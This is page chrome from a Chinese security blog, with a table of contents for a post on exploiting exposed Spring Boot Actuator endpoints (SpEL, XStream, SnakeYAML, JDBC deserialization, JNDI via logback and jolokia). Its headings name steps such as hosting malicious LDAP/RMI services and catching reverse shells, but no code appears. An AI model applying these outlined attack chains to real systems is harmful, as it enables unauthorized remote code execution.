href="/tags/java-%E5%90%8E%E7%AB%AF-web%E5%AE%89%E5%85%A8-%E6%BC%8F%E6%B4%9E/">java 后端 web安全 漏洞</a></div><div class="post_share"><div class="social-share" data-image="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/02/16/%E9%92%89%E9%92%89%20RCE%20%E6%BC%8F%E6%B4%9E/"><img class="prev-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225569.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">钉钉 RCE 漏洞</div></div></a></div><div class="next-post pull-right"><a href="/2022/01/29/SonarQube%20%E6%9C%AA%E6%8E%88%E6%9D%83%E6%BC%8F%E6%B4%9E/"><img class="next-cover" src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225559.webp" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">SonarQube 未授权漏洞</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Zeo</div><div class="author-info__description">专注于安全,分享生活,分享知识</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/godzeo"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/godzeo" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:zzzhhhaaaiiii@gmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">Weclome my blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Spring-Boot-Actuator%E7%AE%80%E4%BB%8B"><span class="toc-number">2.</span> <span class="toc-text">Spring Boot Actuator简介</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#whitelabel-error-page-SpEL-RCE"><span class="toc-number">3.</span> <span class="toc-text">whitelabel error page SpEL RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC%EF%BC%9A"><span class="toc-number">3.1.</span> <span class="toc-text">1 影响版本：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-number">3.2.</span> <span class="toc-text">2 漏洞原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E9%AA%8C%E8%AF%81%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-number">3.3.</span> <span class="toc-text">3 验证检测方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E6%89%BE%E5%88%B0%E4%B8%80%E4%B8%AA%E6%AD%A3%E5%B8%B8%E4%BC%A0%E5%8F%82%E5%A4%84"><span class="toc-number">3.3.1.</span> <span class="toc-text">步骤一：找到一个正常传参处</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A%E6%89%A7%E8%A1%8C-SpEL-%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">3.3.2.</span> <span class="toc-text">步骤二：执行 SpEL 表达式</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-number">3.4.</span> <span class="toc-text">4 利用方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%EF%BC%9A"><span class="toc-number">3.4.0.1.</span> <span class="toc-text">漏洞环境搭建：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#eureka-xstream-deserialization-RCE"><span class="toc-number">4.</span> <span class="toc-text">eureka xstream deserialization RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A"><span class="toc-number">4.1.</span> <span class="toc-text">1 利用条件：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A-1"><span class="toc-number">4.2.</span> <span class="toc-text">2 漏洞原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%EF%BC%9A"><span class="toc-number">4.3.</span> <span class="toc-text">3 漏洞环境：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">4.4.</span> <span class="toc-text">4 漏洞复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A3%E5%B8%B8%E8%AE%BF%E9%97%AE%EF%BC%9A"><span class="toc-number">4.4.1.</span> <span class="toc-text">正常访问：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%91%E7%8E%B0%E5%AD%98%E5%9C%A8%E6%89%80%E9%9C%80%E7%9A%84%E4%BE%9D%E8%B5%96"><span class="toc-number">4.4.2.</span> <span class="toc-text">发现存在所需的依赖</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nc-%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%EF%BC%8C%E7%AD%89%E5%BE%85%E5%8F%8D%E5%BC%B9-shell"><span class="toc-number">4.4.3.</span> <span class="toc-text">nc 监听端口，等待反弹 shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%B6%E8%AE%BE%E5%93%8D%E5%BA%94%E6%81%B6%E6%84%8F-XStream-payload-%E7%9A%84%E7%BD%91%E7%AB%99"><span class="toc-number">4.4.4.</span> <span class="toc-text">架设响应恶意 XStream payload 的网站</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%91%E9%80%81%E8%AE%BE%E7%BD%AE-eureka-client-serviceUrl-defaultZone-%E5%B1%9E%E6%80%A7"><span class="toc-number">4.4.5.</span> <span class="toc-text">发送设置 eureka.client.serviceUrl.defaultZone 属性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE"><span class="toc-number">4.4.6.</span> <span class="toc-text">刷新配置</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-number">4.5.</span> <span class="toc-text">5 利用方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E6%9E%B6%E8%AE%BE%E5%93%8D%E5%BA%94%E6%81%B6%E6%84%8F-XStream-payload-%E7%9A%84%E7%BD%91%E7%AB%99"><span class="toc-number">4.5.0.0.1.</span> <span class="toc-text">步骤一：架设响应恶意 XStream payload 的网站</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3"><span class="toc-number">4.5.0.0.2.</span> <span class="toc-text">步骤二：监听反弹 shell 的端口</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%89%EF%BC%9A%E8%AE%BE%E7%BD%AE-eureka-client-serviceUrl-defaultZone-%E5%B1%9E%E6%80%A7"><span class="toc-number">4.5.0.0.3.</span> <span class="toc-text">步骤三：设置 eureka.client.serviceUrl.defaultZone 属性</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%9B%9B%EF%BC%9A%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE"><span class="toc-number">4.5.0.0.4.</span> <span class="toc-text">步骤四：刷新配置</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#spring-cloud-SnakeYAML-RCE"><span class="toc-number">5.</span> <span class="toc-text">spring cloud SnakeYAML RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A-1"><span class="toc-number">5.1.</span> <span class="toc-text">1 利用条件：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-number">5.2.</span> <span class="toc-text">2 利用方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A-%E6%89%98%E7%AE%A1-yml-%E5%92%8C-jar-%E6%96%87%E4%BB%B6"><span class="toc-number">5.2.1.</span> <span class="toc-text">步骤一： 托管 yml 和 jar 文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A-%E8%AE%BE%E7%BD%AE-spring-cloud-bootstrap-location-%E5%B1%9E%E6%80%A7"><span class="toc-number">5.2.2.</span> <span class="toc-text">步骤二： 设置 spring.cloud.bootstrap.location 属性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%89%EF%BC%9A-%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE"><span class="toc-number">5.2.3.</span> <span class="toc-text">步骤三： 刷新配置</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-number">5.3.</span> <span class="toc-text">3 漏洞原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B%E5%88%86%E6%9E%90%EF%BC%9A"><span class="toc-number">5.4.</span> <span class="toc-text">4 利用过程分析：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83%EF%BC%9A"><span class="toc-number">5.5.</span> <span class="toc-text">5 漏洞环境：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#springboot-mysql-jdbc-deserialization-RCE"><span class="toc-number">6.</span> <span class="toc-text">springboot mysql jdbc deserialization RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A-2"><span class="toc-number">6.1.</span> <span class="toc-text">1 利用条件：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A-2"><span class="toc-number">6.2.</span> <span class="toc-text">2 漏洞原理：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B"><span class="toc-number">6.3.</span> <span class="toc-text">3 利用过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E6%9F%A5%E7%9C%8B%E7%8E%AF%E5%A2%83%E4%BE%9D%E8%B5%96"><span class="toc-number">6.3.1.</span> <span class="toc-text">步骤一：查看环境依赖</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rogue-mysql-server"><span class="toc-number">6.3.2.</span> <span class="toc-text">步骤二：架设恶意 rogue mysql server</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%89%EF%BC%9A%E8%AE%BE%E7%BD%AE-spring-datasource-url-%E5%B1%9E%E6%80%A7"><span class="toc-number">6.3.3.</span> <span class="toc-text">步骤三：设置 spring.datasource.url 属性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%9B%9B%EF%BC%9A%E5%88%B7%E6%96%B0%E9%85%8D%E7%BD%AE-1"><span class="toc-number">6.3.4.</span> <span class="toc-text">步骤四：刷新配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%94%EF%BC%9A%E8%A7%A6%E5%8F%91%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9F%A5%E8%AF%A2"><span class="toc-number">6.3.5.</span> <span class="toc-text">步骤五：触发数据库查询</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%85%AD%EF%BC%9A%E6%81%A2%E5%A4%8D%E6%AD%A3%E5%B8%B8-jdbc-url"><span class="toc-number">6.3.6.</span> <span class="toc-text">步骤六：恢复正常 jdbc url</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#restart-logging-config-logback-JNDI-RCE"><span class="toc-number">7.</span> <span class="toc-text">restart logging.config logback JNDI RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A-3"><span class="toc-number">7.1.</span> <span class="toc-text">1 利用条件：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A-1"><span class="toc-number">7.2.</span> <span class="toc-text">2 利用方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E6%89%98%E7%AE%A1-xml-%E6%96%87%E4%BB%B6"><span class="toc-number">7.2.1.</span> <span class="toc-text">步骤一：托管 xml 文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A%E6%89%98%E7%AE%A1%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1%E5%8F%8A%E4%BB%A3%E7%A0%81"><span class="toc-number">7.2.2.</span> <span class="toc-text">步骤二：托管恶意 ldap 服务及代码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%89%EF%BC%9A%E8%AE%BE%E7%BD%AE-logging-config-%E5%B1%9E%E6%80%A7"><span class="toc-number">7.2.3.</span> <span class="toc-text">步骤三：设置 logging.config 属性</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%9B%9B%EF%BC%9A%E9%87%8D%E5%90%AF%E5%BA%94%E7%94%A8"><span class="toc-number">7.2.4.</span> <span class="toc-text">步骤四：重启应用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A"><span class="toc-number">7.3.</span> <span class="toc-text">4 漏洞原理：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Springboot-jolokia-Realm-JNDI-RCE"><span class="toc-number">8.</span> <span class="toc-text">Springboot jolokia Realm JNDI RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%AD%A3%E5%B8%B8%E8%AE%BF%E9%97%AE%EF%BC%9A"><span class="toc-number">8.1.</span> <span class="toc-text">1 正常访问：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A"><span class="toc-number">8.2.</span> <span class="toc-text">2 利用条件：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A"><span class="toc-number">8.3.</span> <span class="toc-text">3 利用方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-MBeans"><span class="toc-number">8.3.1.</span> <span class="toc-text">步骤一：查看已存在的 MBeans</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A%E5%87%86%E5%A4%87%E8%A6%81%E6%89%A7%E8%A1%8C%E7%9A%84-Java-%E4%BB%A3%E7%A0%81"><span class="toc-number">8.3.2.</span> <span class="toc-text">步骤二：准备要执行的 Java 代码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%89%EF%BC%9A%E6%89%98%E7%AE%A1-class-%E6%96%87%E4%BB%B6"><span class="toc-number">8.3.3.</span> <span class="toc-text">步骤三：托管 class 文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%9B%9B%EF%BC%9A%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-rmi-%E6%9C%8D%E5%8A%A1"><span class="toc-number">8.3.4.</span> <span class="toc-text">步骤四：架设恶意 rmi 服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%94%EF%BC%9A%E7%9B%91%E5%90%AC%E5%8F%8D%E5%BC%B9-shell-%E7%9A%84%E7%AB%AF%E5%8F%A3"><span class="toc-number">8.3.5.</span> <span class="toc-text">步骤五：监听反弹 shell 的端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%85%AD%EF%BC%9A%E5%8F%91%E9%80%81%E6%81%B6%E6%84%8F-payload"><span class="toc-number">8.3.6.</span> <span class="toc-text">步骤六：发送恶意 payload</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A-1"><span class="toc-number">8.4.</span> <span class="toc-text">4 漏洞原理：</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Springboot-jolokia-logback-JNDI-RCE"><span class="toc-number">9.</span> <span class="toc-text">Springboot jolokia logback JNDI RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%AD%A3%E5%B8%B8%E8%AE%BF%E9%97%AE%EF%BC%9A"><span class="toc-number">9.1.</span> <span class="toc-text">1 漏洞环境,正常访问：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6%EF%BC%9A-1"><span class="toc-number">9.2.</span> <span class="toc-text">2 利用条件：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95%EF%BC%9A-1"><span class="toc-number">9.3.</span> <span class="toc-text">3 利用方法：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%80%EF%BC%9A%E6%9F%A5%E7%9C%8B%E5%B7%B2%E5%AD%98%E5%9C%A8%E7%9A%84-MBeans-1"><span class="toc-number">9.3.1.</span> <span class="toc-text">步骤一：查看已存在的 MBeans</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%BA%8C%EF%BC%9A%E6%89%98%E7%AE%A1-xml-%E6%96%87%E4%BB%B6"><span class="toc-number">9.3.2.</span> <span class="toc-text">步骤二：托管 xml 文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E4%B8%89%EF%BC%9A%E6%9E%B6%E8%AE%BE%E6%81%B6%E6%84%8F-ldap-%E6%9C%8D%E5%8A%A1"><span class="toc-number">9.3.3.</span> <span class="toc-text">步骤三：架设恶意 ldap 服务</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A5%E9%AA%A4%E5%9B%9B%EF%BC%9A%E4%BB%8E%E5%A4%96%E9%83%A8-URL-%E5%9C%B0%E5%9D%80%E5%8A%A0%E8%BD%BD%E6%97%A5%E5%BF%97%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6"><span class="toc-number">9.3.4.</span> <span class="toc-text">步骤四：从外部 URL 地址加载日志配置文件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%EF%BC%9A-2"><span class="toc-number">9.4.</span> <span class="toc-text">4 漏洞原理：</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Nosql inject注入"/></a><div class="content"><a class="title" href="/2022/11/28/Nosql%20inject%E6%B3%A8%E5%85%A5/" title="Nosql inject注入">Nosql inject注入</a><time datetime="2022-11-28T07:28:02.000Z" title="发表于 2022-11-28 15:28:02">2022-11-28</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231217732.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="企业 SDLC 安全生命周期管理"/></a><div class="content"><a class="title" href="/2022/11/15/%E4%BC%81%E4%B8%9A%20SDLC%20%E5%AE%89%E5%85%A8%E7%94%9F%E5%91%BD%E5%91%A8%E6%9C%9F%E7%AE%A1%E7%90%86/" title="企业 SDLC 安全生命周期管理">企业 SDLC 安全生命周期管理</a><time datetime="2022-11-15T14:03:44.000Z" title="发表于 2022-11-15 22:03:44">2022-11-15</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计漏洞(File Operation\Redirect\Cors)"/></a><div class="content"><a class="title" href="/2022/11/05/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E6%BC%8F%E6%B4%9E(File%20Operation!Redirect!Cors)/" title="Go 代码审计漏洞(File Operation\Redirect\Cors)">Go 代码审计漏洞(File Operation\Redirect\Cors)</a><time datetime="2022-11-05T09:15:28.000Z" title="发表于 2022-11-05 17:15:28">2022-11-05</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Go 代码审计高危漏洞(sqli\cmd\ssrf)"/></a><div class="content"><a class="title" href="/2022/10/30/Go%20%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E(sqli!cmd!ssrf)/" title="Go 代码审计高危漏洞(sqli\cmd\ssrf)">Go 代码审计高危漏洞(sqli\cmd\ssrf)</a><time datetime="2022-10-30T06:57:14.000Z" title="发表于 2022-10-30 14:57:14">2022-10-30</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Java代码审计： ClassLoader应用"/></a><div class="content"><a class="title" href="/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/" title="Java代码审计： ClassLoader应用">Java代码审计： ClassLoader应用</a><time datetime="2022-05-10T08:21:21.000Z" title="发表于 2022-05-10 16:21:21">2022-05-10</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2022 By Zeo</div><div class="footer_custom_text">Hi, welcome to my blog!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"></div></div></body></html>